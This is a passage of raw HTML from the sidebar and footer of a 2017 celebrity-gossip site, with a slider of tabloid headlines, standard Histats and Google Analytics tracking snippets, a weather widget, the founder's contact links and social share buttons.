They Get Naked In Racy YouTube Video — Watch">John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T11:02:45+00:00" >April 22, 2017</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/#respond">0</a></div></div></div></div><div id="td_uid_14_58fb774a9a431_item_1" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"><img width="324" height="400" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Katy-Perry-324x400.png" alt="Katy Perry" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></span><h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic">Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:53:13+00:00" >April 22, 2017</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/#respond">0</a></div></div></div></div><div id="td_uid_14_58fb774a9a431_item_2" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"><img width="324" height="400" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Selena-Gomez-4-324x400.png" alt="Selena Gomez" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></span><h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic">Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:40:00+00:00" >April 22, 2017</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/#respond">0</a></div></div></div></div><div id="td_uid_14_58fb774a9a431_item_3" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" rel="bookmark" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report"><img width="324" height="400" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez-324x400.png" alt="Aaron Hernandez" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></span><h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" rel="bookmark" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report">Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:33:19+00:00" >April 22, 2017</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/#respond">0</a></div></div></div></div><div id="td_uid_14_58fb774a9a431_item_4" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/" rel="bookmark" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed"><img width="324" height="400" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Caitlyn-Jenner-1-324x400.png" alt="Caitlyn Jenner" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></span><h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/" rel="bookmark" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed">Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:11:48+00:00" >April 22, 2017</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/#respond">0</a></div></div></div></div></div><i class = "td-icon-left prevButton"></i><i class = "td-icon-right nextButton"></i></div></div></div> <!-- ./block1 --><aside class="widget widget_text">			<div class="textwidget">   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script></div>
		</aside>            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_uid_15_58fb774a9e072_rand widget widget_categories td-pb-border-top"  data-td-block-uid="td_uid_15_58fb774a9e072" ><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://www.thenewstrack.com/category/showbiz-news/">Showbiz<span class="td-cat-no">5217</span></a></li><li><a href="http://www.thenewstrack.com/category/entertainment/">Entertainment<span class="td-cat-no">2781</span></a></li><li><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities<span class="td-cat-no">2058</span></a></li><li><a href="http://www.thenewstrack.com/category/pakistan-news/">Pakistan News<span class="td-cat-no">2051</span></a></li><li><a href="http://www.thenewstrack.com/category/international-news/">International<span class="td-cat-no">1474</span></a></li><li><a href="http://www.thenewstrack.com/category/fashion-lifestyle/">Fashion &amp; LifeStyle<span class="td-cat-no">1418</span></a></li><li><a href="http://www.thenewstrack.com/category/top-10/">TOP 10<span class="td-cat-no">1349</span></a></li><li><a href="http://www.thenewstrack.com/category/sports/">Sports News<span class="td-cat-no">647</span></a></li><li><a href="http://www.thenewstrack.com/category/hollywood/">Hollywood<span class="td-cat-no">602</span></a></li></ul></div> <!-- ./block -->                <div class="td_block_wrap td_block_weather td_block_widget td_uid_16_58fb774aa8088_rand td-pb-border-top"  data-td-block-uid="td_uid_16_58fb774aa8088" ><h4 class="block-title"><span>WEATHER UPDATE</span></h4><div id=td_uid_16_58fb774aa8088 class="td-weather-wrap td_block_inner td-column-1"><!-- td weather source: cache -->
		<div class="td-weather-header">
			<div class="td-weather-city">NEW YORK</div>
			<div class="td-weather-condition">light intensity drizzle</div>
			<i class="td-location-icon td-icons-location"  data-block-uid="td_uid_16_58fb774aa8088"></i>
		</div>

		<div class="td-weather-set-location">
			<form class="td-manual-location-form" action="#" data-block-uid="td_uid_16_58fb774aa8088">
				<input id="td_uid_16_58fb774aa8088" class="td-location-set-input" type="text" name="location" value="" >
				<label>enter location</label>
			</form>
		</div>

		<div class="td-weather-temperature">
			<div class="td-weather-temp-wrap">
				<div class="td-weather-animated-icon">
					<span class="td_animation_sprite-27-100-80-0-0-1 shower-rain-d td-w-today-icon" data-td-block-uid="td_uid_16_58fb774aa8088"></span>
				</div>
				<div class="td-weather-now" data-block-uid="td_uid_16_58fb774aa8088">
					<span class="td-big-degrees">11.6</span>
					<span class="td-circle">&deg;</span>
					<span class="td-weather-unit">C</span>
				</div>
				<div class="td-weather-lo-hi">
					<div class="td-weather-degrees-wrap">
						<i class="td-up-icon td-icons-arrows-up"></i>
						<span class="td-small-degrees td-w-high-temp">13</span>
						<span class="td-circle">&deg;</span>
					</div>
					<div class="td-weather-degrees-wrap">
						<i class="td-down-icon td-icons-arrows-down"></i>
						<span class="td-small-degrees td-w-low-temp">10</span>
						<span class="td-circle">&deg;</span>
					</div>
				</div>
			</div>
		</div>

		<div class="td-weather-info-wrap">
			<div class="td-weather-information">
				<div class="td-weather-section-1">
					<i class="td-icons-drop"></i>
					<span class="td-weather-parameter td-w-today-humidity">76%</span>
				</div>
				<div class="td-weather-section-2">
					<i class="td-icons-wind"></i>
					<span class="td-weather-parameter td-w-today-wind-speed">1.5kmh</span>
				</div>
				<div class="td-weather-section-3">
					<i class="td-icons-cloud"></i>
					<span class="td-weather-parameter td-w-today-clouds">90%</span>
				</div>
			</div>


			<div class="td-weather-week">
									<div class="td-weather-days">
						<div class="td-day-0">Sun</div>
						<div class="td-day-degrees">
							<span class="td-degrees-0">12</span>
							<span class="td-circle">&deg;</span>
						</div>
					</div>
										<div class="td-weather-days">
						<div class="td-day-1">Mon</div>
						<div class="td-day-degrees">
							<span class="td-degrees-1">14</span>
							<span class="td-circle">&deg;</span>
						</div>
					</div>
										<div class="td-weather-days">
						<div class="td-day-2">Tue</div>
						<div class="td-day-degrees">
							<span class="td-degrees-2">15</span>
							<span class="td-circle">&deg;</span>
						</div>
					</div>
										<div class="td-weather-days">
						<div class="td-day-3">Wed</div>
						<div class="td-day-degrees">
							<span class="td-degrees-3">19</span>
							<span class="td-circle">&deg;</span>
						</div>
					</div>
										<div class="td-weather-days">
						<div class="td-day-4">Thu</div>
						<div class="td-day-degrees">
							<span class="td-degrees-4">18</span>
							<span class="td-circle">&deg;</span>
						</div>
					</div>
								</div>
		</div>
		</div></div> <!-- ./block --><aside class="widget widget_text">			<div class="textwidget">   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script></div>
		</aside>            </div>
        </div>
    </div>
    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://www.thenewstrack.com/"><img class="td-retina-data" src="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff-1.png" data-retina="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff-3.png" alt="THE NEWS TRACK" title="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists"/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>I Am a Computer Geek and Obsessed with It . I Have Been Working as a Professional Blogger since 2009.I Am the Founder of thenewstrack.com. <div class="footer-email-wrap">Contact us: <a href="mailto:pervaizvohra466@gmail.com">pervaizvohra466@gmail.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://thenewstrackofficial1.blogspot.com/" title="Blogger">
                <i class="td-icon-font td-icon-blogger"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://digg.com/u/thenewstrack" title="Digg">
                <i class="td-icon-font td-icon-digg"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/thenewstrack" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.flickr.com/people/thenewstrackcom/" title="Flickr">
                <i class="td-icon-font td-icon-flickr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/+thenewstrack" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/thenewstrack/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://pk.linkedin.com/in/sheikh-pervaiz-vohra-4b1a8438" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="mailto:pervaizvohra466@gmail.com" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://myspace.com/thenewstrack" title="Myspace">
                <i class="td-icon-font td-icon-myspace"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="webstrackinc@gmail.com" title="Paypal">
                <i class="td-icon-font td-icon-paypal"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.pinterest.com/thenewstrack/" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Reddit">
                <i class="td-icon-font td-icon-reddit"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Skype">
                <i class="td-icon-font td-icon-skype"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://soundcloud.com/sheikh-pervaiz-vohra" title="Soundcloud">
                <i class="td-icon-font td-icon-soundcloud"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.stumbleupon.com/submit" title="StumbleUpon">
                <i class="td-icon-font td-icon-stumbleupon"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.tumblr.com/login?redirect_to=%2Fblog%2Fthenewstrackofficial" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/thenewstrack" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="Vimeo">
                <i class="td-icon-font td-icon-vimeo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="VKontakte">
                <i class="td-icon-font td-icon-vk"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="Windows">
                <i class="td-icon-font td-icon-windows"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://en.gravatar.com/pervaiz1222" title="WordPress">
                <i class="td-icon-font td-icon-wordpress"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra@yahoo.com" title="Yahoo">
                <i class="td-icon-font td-icon-yahoo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCp7yffgMZiur1QK8yKUxqhA" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <div class="menu-trending-menu-final-container"><ul id="menu-trending-menu-final-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-139738"><a href="http://www.thenewstrack.com/">HOME</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-139383"><a href="http://www.thenewstrack.com/category/international-news/">International</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106454"><a href="http://www.thenewstrack.com/category/pakistan-news/">Pakistan News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106450"><a href="http://www.thenewstrack.com/category/showbiz-news/">Showbiz</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106453"><a href="http://www.thenewstrack.com/category/entertainment/">Entertainment</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106451"><a href="http://www.thenewstrack.com/category/fashion-lifestyle/">Fashion &#038; LifeStyle</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106452"><a href="http://www.thenewstrack.com/category/top-10/">TOP 10</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110088"><a href="http://www.thenewstrack.com/category/sports/">Sports News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110089"><a href="http://www.thenewstrack.com/category/car-news/">Technology</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110090"><a href="http://www.thenewstrack.com/category/top-5/">Top 5</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-145691"><a href="http://www.thenewstrack.com/contact/">Contact</a></li>
</ul></div>                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy; Proudly Powered By Webstrack.inc                </div>
            </div>
        </div>
    </div>
</div><!--close td-outer-wrap-->

<div class="essb_links essb_counters essb_counter_modern_right essb_displayed_sidebar essb_share essb_template_copy-retina essb_246690210 print-no" id="essb_displayed_sidebar_246690210" data-essb-postid="147097" data-essb-position="sidebar" data-essb-button-style="icon" data-essb-template="copy-retina" data-essb-counter-pos="right" data-essb-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-twitter-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-instance="246690210"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" data-counter-pos="right"><span class="essb_totalcount essb_t_l_big" title=""><span class="essb_t_nb"></span></span></li><li class="essb_item essb_link_facebook nolightbox"> <a href="http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;facebook&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb_window(&#39;https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/?p=147097&amp;counturl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;hashtags=&#39;,&#39;twitter&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;google&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href="#" title="" onclick="essb_pinterest_picker(&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;linkedin&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;stumbleupon&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;tumblr&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;reddit&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_love nolightbox"> <a href="#" title="" onclick="essb_lovethis(&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href="#" title="" onclick="essb_toggle_more_popup(&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_whatsapp nolightbox essb_after_more"> <a href="whatsapp://send?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'whatsapp', '246690210', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_blogger nolightbox essb_after_more"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;blogger&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_yahoomail nolightbox essb_after_more"> <a href="http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;yahoomail&#39;,&#39;246690210&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_sms nolightbox essb_after_more"> <a href="sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;sms&#39;,&#39;246690210&#39;); return false;" 